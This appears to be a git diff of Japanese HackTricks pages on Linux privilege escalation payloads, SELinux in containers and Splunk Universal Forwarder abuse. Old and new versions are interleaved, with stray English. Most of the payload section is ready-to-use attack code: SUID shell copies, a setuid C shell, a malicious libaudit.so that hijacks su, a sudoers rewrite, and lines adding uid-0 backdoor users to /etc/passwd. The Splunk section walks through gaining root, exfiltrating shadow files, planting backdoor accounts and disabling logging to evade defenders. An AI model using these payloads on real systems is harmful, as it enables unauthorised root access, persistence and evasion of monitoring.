* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で私をフォローする [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに。
</details>

116
linux-hardening/privilege-escalation/payloads-to-execute.md
View file

@ -1,14 +1,14 @@
# 実行するペイロード
# 実行ペイロード
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するに、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
@ -17,56 +17,46 @@
cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
```
## ペイロードの実行
## C
このセクションでは、特権昇格を行うために使用できるさまざまなペイロードについて説明します。これらのペイロードは、標準的なLinuxシステムで実行されることを想定しています。
### Payloads to Execute
### 1. SUIDバイナリの利用
SUIDSet User IDバイナリは、実行時に所有者の特権で実行されるバイナリです。これを利用すると、特権のあるコマンドを実行できます。
#### Bash
```bash
$ find / -perm -u=s -type f 2>/dev/null
echo "echo 'I am root!'" > /tmp/update.sh
chmod +x /tmp/update.sh
sudo /tmp/update.sh
```
上記のコマンドを実行すると、SUIDビットが設定されたバイナリのリストが表示されます。これらのバイナリを使用して、特権昇格を試みることができます。
#### Python
### 2. LD_PRELOADを使用したライブラリのロード
LD_PRELOAD環境変数を使用すると、特定のライブラリをプロセスのロードパスに追加できます。これを利用して、特権のあるライブラリをロードし、特権昇格を行うことができます。
```bash
$ gcc -shared -o /tmp/exploit.so /tmp/exploit.c
$ LD_PRELOAD=/tmp/exploit.so <command>
```python
import os
os.system("echo 'I am root!'")
```
上記のコマンドを実行すると、`<command>`が実行される際に`/tmp/exploit.so`がロードされます。これにより、特権のあるコードが実行され、特権昇格が可能になります。
#### Perl
### 3. カーネルモジュールのロード
カーネルモジュールをロードすることで、特権昇格を行うことができます。以下のコマンドを使用して、カーネルモジュールをロードします。
```bash
$ insmod /path/to/module.ko
```perl
system("echo 'I am root!'");
```
上記のコマンドを実行すると、指定したカーネルモジュールがロードされます。これにより、特権のある機能を利用して特権昇格を行うことができます。
#### Ruby
### 4. プロセスの権限昇格
特権昇格を行うために、既存のプロセスの権限を昇格させることもできます。以下のコマンドを使用して、プロセスの権限を昇格させます。
```bash
$ gdb -p <pid>
(gdb) call setuid(0)
(gdb) call setgid(0)
(gdb) detach
(gdb) quit
```ruby
exec "echo 'I am root!'"
```
上記のコマンドを実行すると、指定したプロセスの権限が昇格されます。これにより、特権のある操作を実行することができます。
#### C
これらのペイロードを使用して、特権昇格を試みることができます。ただし、これらの操作は合法的な目的でのみ使用するようにしてください。
```c
#include <stdlib.h>
int main() {
system("echo 'I am root!'");
return 0;
}
```
```c
//gcc payload.c -o payload
int main(void){
@ -103,18 +93,18 @@ execve(paramList[0], paramList, NULL);
return 0;
}
```
## ファイルを上書きして特権を昇格させる
## 特権昇格のためのファイルの上書き
### 一般的なファイル
* パスワード付きのユーザーを _/etc/passwd_ に追加する
* パスワードを持つユーザーを_/etc/passwd_ に追加する
* _/etc/shadow_ 内のパスワードを変更する
* _/etc/sudoers_ 内のsudoersにユーザーを追加する
* 通常 _/run/docker.sock__/var/run/docker.sock_ にある、dockerソケットを悪用する
* _/run/docker.sock_ または _/var/run/docker.sock_ にあるdockerソケットを悪用する
### ライブラリの上書き
いくつかのバイナリで使用されているライブラリをチェックします。この場合は `/bin/su` です
いくつかのバイナリで使用されているライブラリをチェックします。この場合は `/bin/su` です
```bash
ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
@ -126,8 +116,8 @@ libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
```
この場合は、`/lib/x86_64-linux-gnu/libaudit.so.1`をなりすましましょう。\
したがって、**`su`**バイナリで使用されるこのライブラリの関数をチェックします。
この場合は、`/lib/x86_64-linux-gnu/libaudit.so.1` を偽装しようとしています。\
したがって、**`su`** バイナリで使用されているこのライブラリの関数をチェックしてください:
```bash
objdump -T /bin/su | grep audit
0000000000000000 DF *UND* 0000000000000000 audit_open
@ -135,7 +125,7 @@ objdump -T /bin/su | grep audit
0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message
000000000020e968 g DO .bss 0000000000000004 Base audit_fd
```
シンボル`audit_open`、`audit_log_acct_message`、`audit_log_acct_message`、および`audit_fd`はおそらくlibaudit.so.1ライブラリから来ています。悪意のある共有ライブラリによってlibaudit.so.1が上書きされるため、これらのシンボルは新しい共有ライブラリに存在する必要があります。そうでない場合、プログラムはシンボルを見つけることができず、終了します。
以下のシンボル `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` および `audit_fd` はおそらく libaudit.so.1 ライブラリから来ています。libaudit.so.1 は悪意のある共有ライブラリによって上書きされるため、これらのシンボルは新しい共有ライブラリに存在する必要があります。そうでないと、プログラムはシンボルを見つけることができずに終了します。
```c
#include<stdio.h>
#include<stdlib.h>
@ -157,7 +147,7 @@ setgid(0);
system("/bin/bash");
}
```
今、**`/bin/su`** を呼び出すだけで、rootとしてシェルを取得できます。
今、単に**`/bin/su`**を呼び出すだけで、rootとしてシェルを取得できます。
## スクリプト
@ -168,26 +158,10 @@ rootに何かを実行させることはできますか
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
```
### **ルートパスワードの変更**
To change the root password, you can use the following command:
ルートパスワードを変更するには、次のコマンドを使用します。
```bash
sudo passwd root
```
You will be prompted to enter the new password twice. After successfully changing the password, you can log in as root using the new password.
新しいパスワードを2回入力するように求められます。パスワードの変更に成功した後は、新しいパスワードを使用してルートとしてログインできます。
```bash
echo "root:hacked" | chpasswd
```
### /etc/passwd に新しい root ユーザーを追加する
```bash
echo 'newroot:x:0:0:root:/root:/bin/bash' >> /etc/passwd
```
### /etc/passwd に新しい root ユーザーを追加します
```bash
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
```
@ -195,10 +169,10 @@ echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysal
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですかまたは、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングのトリックを共有する**には、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**してみたいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクション
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>

38
linux-hardening/privilege-escalation/selinux.md
View file

@ -1,23 +1,25 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私をフォローする:[**@carlospolopm**](https://twitter.com/carlospolopm)
- **ハッキングテクニックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
# SELinux in Containers
# コンテナ内のSELinux
[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux)は**ラベリング** **システム**です。すべての**プロセス**とファイルシステムオブジェクトには**ラベル**があります。SELinuxポリシーは、**プロセスラベルがシステム上の他のすべてのラベルで許可されている操作**についてのルールを定義します。
[Red Hatのドキュメントからの紹介と例](https://www.redhat.com/sysadmin/privileged-flag-container-engines)
コンテナエンジンは、通常`container_t`という単一の制限されたSELinuxラベルで**コンテナプロセス**を起動し、その後コンテナ内部を`container_file_t`とラベル付けします。SELinuxポリシールールは基本的に、**`container_t`プロセスは`container_file_t`とラベル付けされたファイルの読み書き/実行のみが可能**であると述べています。コンテナプロセスがコンテナから脱出してホスト上のコンテンツに書き込もうとすると、Linuxカーネルはアクセスを拒否し、コンテナプロセスが`container_file_t`とラベル付けされたコンテンツにのみ書き込むことを許可します。
[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux)は**ラベリングシステム**です。すべての**プロセス**と**ファイル**システムオブジェクトには**ラベル**があります。SELinuxポリシーは、システム上の他のすべてのラベルと何を**プロセスラベルが許可されているか**についてのルールを定義します。
コンテナエンジンは、通常`container_t`という1つの制限付きSELinuxラベルで**コンテナプロセスを起動**し、その後コンテナ内のコンテナを`container_file_t`としてラベル付けします。SELinuxポリシールールは基本的に、**`container_t`プロセスが`container_file_t`とラベル付けされたファイルを読み取り/書き込み/実行できる**と言っています。コンテナプロセスがコンテナを脱出してホスト上のコンテンツに書き込もうとすると、Linuxカーネルはアクセスを拒否し、コンテナプロセスが`container_file_t`とラベル付けされたコンテンツにのみ書き込むことを許可します。
```shell
$ podman run -d fedora sleep 100
d4194babf6b877c7100e79de92cd6717166f7302113018686cea650ea40bd7cb
@ -27,18 +29,4 @@ system_u:system_r:container_t:s0:c647,c780
```
# SELinuxユーザー
通常のLinuxユーザーに加えて、SELinuxユーザーが存在します。SELinuxユーザーはSELinuxポリシーの一部です。各Linuxユーザーはポリシーの一部としてSELinuxユーザーにマッピングされます。これにより、LinuxユーザーはSELinuxユーザーに設定された制限やセキュリティルール、メカニズムを継承することができます。
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)で<strong>AWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの**会社を広告したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
</details>
通常のLinuxユーザーに加えて、SELinuxユーザーが存在します。SELinuxユーザーはSELinuxポリシーの一部です。各Linuxユーザーはポリシーの一部としてSELinuxユーザーにマッピングされます。これにより、LinuxユーザーはSELinuxユーザーに配置された制限やセキュリティルール、メカニズムを継承することができます。

186
linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
View file

@ -1,182 +1,62 @@
# Splunk LPEと永続性
# Splunk LPE and Persistence
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有する。
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、 [telegramグループ](https://t.me/peass) に参加するか、 **Twitter** 🐦 で **@carlospolopm** をフォローする
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する。
</details>
**内部**または**外部**でマシンを**列挙**していて、**Splunkが実行中**ポート8090を見つけた場合、幸運にも**有効な資格情報**を知っていれば、Splunkサービスを**悪用してシェルを実行**することができます。rootが実行している場合、root権限に昇格することができます。
マシンを **内部** または **外部****列挙** しているときに、ポート8090で **Splunkが実行されている**ことがわかった場合、もし **有効な資格情報**を知っている幸運があれば、Splunkサービスを **悪用** して、Splunkを実行しているユーザーとして **シェルを実行** することができます。rootで実行されている場合は、特権をrootに昇格させることができます。
また、**すでにrootであり、Splunkサービスがlocalhostのみリスニングしていない場合**は、Splunkサービス**から**パスワードファイルを**盗み**、パスワードを**クラック**するか、新しい資格情報を追加することができます。そして、ホスト上で永続性を維持します。
また、すでにrootであり、Splunkサービスが **localhost以外でのみリスニングしていない** 場合、Splunkサービスから **パスワードファイルを盗み**そのパスワードを **クラック** するか、新しい資格情報を追加することができます。そしてホスト上で持続性を維持します。
以下の最初の画像では、Splunkdウェブページの様子を見ることができます。
最初の画像では、SplunkdのWebページがどのように見えるかが示されています。
**以下の情報は** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/) からのものです。
## Splunkフォワーダーを悪用してシェルと永続性を得る
2020年8月14日
## Splunk Universal Forwarder Agent Exploit Summary
### 説明: <a href="#description" id="description"></a>
**詳細については、[https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/) の投稿を確認してください**
Splunk Universal Forwarder AgentUFは、認証されたリモートユーザーがSplunk APIを通じてエージェントに単一のコマンドまたはスクリプトを送信することを可能にします。UFエージェントは、接続が有効なSplunk Enterpriseサーバーからのものであるかを検証せず、UFエージェントはコードが署名されているか、またはSplunk Enterpriseサーバーからのものであることが証明されているかを検証しません。これにより、UFエージェントのパスワードにアクセスした攻撃者は、オペレーティングシステムに応じてSYSTEMまたはrootとしてサーバー上で任意のコードを実行することができます。
**Exploit概要:**
Splunk Universal Forwarder AgentUFを標的とするエクスプロイトは、エージェントのパスワードを持つ攻撃者がエージェントを実行しているシステムで任意のコードを実行できるようにし、ネットワーク全体を危険にさらす可能性があります。
この攻撃はペネトレーションテスターによって使用されており、悪意のある攻撃者によって野生で積極的に悪用されている可能性があります。パスワードを取得すると、顧客環境の何百ものシステムが危険にさらされる可能性があります。
**主なポイント:**
- UFエージェントは、受信接続やコードの信頼性を検証しないため、不正なコードの実行に脆弱です。
- 一般的なパスワード取得方法には、ネットワークディレクトリ、ファイル共有、内部文書での検索が含まれます。
- 成功した悪用により、侵害されたホストでのSYSTEMまたはrootレベルへのアクセス、データの持ち出し、さらなるネットワーク浸透が可能となります。
Splunk UFのパスワードは比較的簡単に取得できます。詳細については、共通パスワードの場所セクションを参照してください。
**Exploitの実行:**
1. 攻撃者がUFエージェントのパスワードを取得します。
2. Splunk APIを使用してコマンドやスクリプトをエージェントに送信します。
3. ファイルの抽出、ユーザーアカウントの操作、システムの侵害など、可能なアクションがあります。
### 文脈: <a href="#context" id="context"></a>
**影響:**
- 各ホストでSYSTEM/rootレベルの権限を持つ完全なネットワーク侵害。
- 検出を回避するためのログの無効化の可能性。
- バックドアやランサムウェアのインストール。
Splunkは、セキュリティ情報およびイベント監視SIEMシステムとしてよく使用されるデータ集約および検索ツールです。Splunk Enterpriseサーバーはサーバー上で実行されるウェブアプリケーションであり、ネットワーク内のすべてのシステムにインストールされるエージェントであるUniversal Forwardersがあります。SplunkはWindows、Linux、Mac、Unix用のエージェントバイナリを提供しています。多くの組織は、Linux/Unixホストにエージェントをインストールする代わりにSyslogを使用してSplunkにデータを送信しますが、エージェントのインストールはますます人気が高まっています。
Universal Forwarderは、https://host:8089で各ホストでアクセスできます。/service/などの保護されたAPI呼び出しにアクセスすると、基本認証ボックスが表示されます。ユーザー名は常にadminであり、パスワードのデフォルトはchangemeでしたが、2016年にSplunkは新しいインストールに対して8文字以上のパスワードを設定することを要求しました。私のデモで注目すべきは、複雑さは要求されていないことで、私のエージェントのパスワードは12345678です。リモート攻撃者はロックアウトなしでパスワードをブルートフォースすることができます。これはログホストの必要性です。なぜなら、アカウントがロックアウトされた場合、ログはもはやSplunkサーバーに送信されなくなり、攻撃者はこれを使用して自分の攻撃を隠すことができるからです。次のスクリーンショットはUniversal Forwarderエージェントを示しており、この初期ページは認証なしでアクセス可能であり、Splunk Universal Forwarderを実行しているホストを列挙するために使用できます。
![0](https://eapolsniper.github.io/assets/2020AUG14/11\_SplunkAgent.png)
Splunkのドキュメントは、すべてのエージェントに同じUniversal Forwardingパスワードを使用することを示していますが、私は確かではありませんが、これが要件であるか、または各エージェントに個別のパスワードを設定できるかどうか。しかし、ドキュメントと私がSplunk管理者だったときの記憶に基づいて、私はすべてのエージェントが同じパスワードを使用する必要があると信じています。これは、パスワードが1つのシステムで見つかったりクラックされたりした場合、それがすべてのSplunk UFホストで機能する可能性が高いことを意味します。これは私の個人的な経験であり、迅速に何百ものホストを妥協させることができました。
### 共通パスワードの場所 <a href="#common-password-locations" id="common-password-locations"></a>
私はしばしば、ネットワーク上の以下の場所でSplunk Universal Forwardingエージェントのプレーンテキストパスワードを見つけます
1. Active Directory Sysvol/domain.com/Scriptsディレクトリ。管理者は、効率的なエージェントインストールのために、実行可能ファイルとパスワードを一緒に保存します。
2. ITインストールファイルをホストするネットワークファイル共有
3. 内部ネットワーク上のWikiまたはその他のビルドートリポジトリ
パスワードは、WindowsホストのProgram Files\Splunk\etc\passwdおよびLinuxおよびUnixホストの/opt/Splunk/etc/passwdでハッシュ形式でもアクセスできます。攻撃者はHashcatを使用してパスワードをクラックするか、クラウドクラッキング環境を借りてクラックの可能性を高めることができます。パスワードは強力なSHA-256ハッシュであり、そのため強力でランダムなパスワードはクラックされる可能性が低いです。
### 影響: <a href="#impact" id="impact"></a>
Splunk Universal Forward Agentのパスワードを持つ攻撃者は、ネットワーク内のすべてのSplunkホストを完全に妥協し、各ホストでSYSTEMまたはrootレベルの権限を取得することができます。私はWindows、Linux、Solaris UnixホストでSplunkエージェントを成功裏に使用しました。この脆弱性により、システムの資格情報がダンプされたり、機密データが外部に流出したり、ランサムウェアがインストールされたりする可能性があります。この脆弱性は迅速で使いやすく、信頼性があります。
Splunkはログを処理するため、攻撃者は最初に実行されるコマンドでUniversal Forwarderを再構成して、Forwarderの場所を変更し、Splunk SIEMへのログ記録を無効にすることができます。これにより、クライアントのBlue Teamに捕まる可能性が大幅に低下します。
Splunk Universal Forwarderは、ログ収集のためにドメインコントローラーにインストールされることがよくあります。これにより、攻撃者は簡単にNTDSファイルを抽出したり、さらなる悪用のためにアンチウイルスを無効にしたり、ドメインを変更したりすることができます。
最後に、Universal Forwarding Agentにはライセンスが必要なく、パスワードでスタンドアロンで構成できます。したがって、攻撃者はUniversal Forwarderをホスト上のバックドア永続性メカニズムとしてインストールできます。これは、Splunkを使用しない顧客であっても、正当なアプリケーションであり、おそらく削除されないでしょう。
### 証拠: <a href="#evidence" id="evidence"></a>
搾取の例を示すために、私はEnterprise ServerとUniversal Forwardingエージェントの両方に最新のSplunkバージョンを使用してテスト環境を設定しました。このレポートには合計10枚の画像が添付されており、以下を示しています
1- PySplunkWhisper2を通じて/etc/passwdファイルを要求する
![1](https://eapolsniper.github.io/assets/2020AUG14/1\_RequestingPasswd.png)
2- Netcatを通じて攻撃者システムに/etc/passwdファイルを受信する
![2](https://eapolsniper.github.io/assets/2020AUG14/2\_ReceivingPasswd.png)
3- PySplunkWhisper2を通じて/etc/shadowファイルを要求する
![3](https://eapolsniper.github.io/assets/2020AUG14/3\_RequestingShadow.png)
4- Netcatを通じて攻撃者システムに/etc/shadowファイルを受信する
![4](https://eapolsniper.github.io/assets/2020AUG14/4\_ReceivingShadow.png)
5- /etc/passwdファイルにユーザーattacker007を追加する
![5](https://eapolsniper.github.io/assets/2020AUG14/5\_AddingUserToPasswd.png)
6- /etc/shadowファイルにユーザーattacker007を追加する
![6](https://eapolsniper.github.io/assets/2020AUG14/6\_AddingUserToShadow.png)
7- attacker007が正常に追加されたことを示す新しい/etc/shadowファイルを受信する
![7](https://eapolsniper.github.io/assets/2020AUG14/7\_ReceivingShadowFileAfterAdd.png)
8- attacker007アカウントを使用して被害者へのSSHアクセスを確認する
![8](https://eapolsniper.github.io/assets/2020AUG14/8\_SSHAccessUsingAttacker007.png)
9- ユーザー名root007のバックドアrootアカウントを追加し、uid/gidを0に設定する
![9](https://eapolsniper.github.io/assets/2020AUG14/9\_AddingBackdoorRootAccount.png)
10- attacker007を使用してSSHアクセスを確認し、その後root007を使用してrootに昇格する
![10](https://eapolsniper.github.io/assets/2020AUG14/10\_EscalatingToRoot.png)
この時点で、Splunkと作成した2つのユーザーアカウントの両方を通じてホストへの永続的なアクセスを持っています。そのうちの1つはrootを提供します。私はリモートログを無効にして自分の足跡を隠し、このホストを使用してシステムとネットワークを攻撃し続けることができます。
PySplunkWhisperer2のスクリプトは非常に簡単で効果的です。
